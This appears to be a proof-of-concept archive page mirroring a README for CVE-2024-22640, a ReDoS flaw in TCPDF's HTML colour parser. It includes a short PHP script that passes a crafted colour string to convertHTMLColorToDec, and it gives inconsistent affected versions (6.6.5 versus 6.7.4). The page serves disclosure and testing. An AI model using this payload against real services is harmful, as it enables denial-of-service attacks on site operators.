Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-22640 PoC — TCPDF 安全漏洞

Source
https://github.com/zunak/CVE-2024-22640
Associated Vulnerability
Title:TCPDF 安全漏洞 (CVE-2024-22640)
Description:TCPDF version <=6.6.5 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.
Readme
# CVE-2024-22640

#### Vulnerability Type
Regular expression Denial of Service (ReDoS)

#### Affected Product and Version
TCPDF <= 6.7.4

#### Attack Vector
TCPDF parse HTML color contains crafted payload.

#### Description
TCPDF version <= 6.7.4 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.

#### PoC
```php
<?php

require_once('../tcpdf.php');

$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
```
> Note: Checking with **preg_last_error()** after the vulnerable line of code, the regEx will exit with **PREG_BACKTRACK_LIMIT_ERROR**.
File Snapshot

 [4.0K]  /data/pocs/f3e34b86bdef9522d2b953c974d57ce55f7b759c
└── [ 779]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →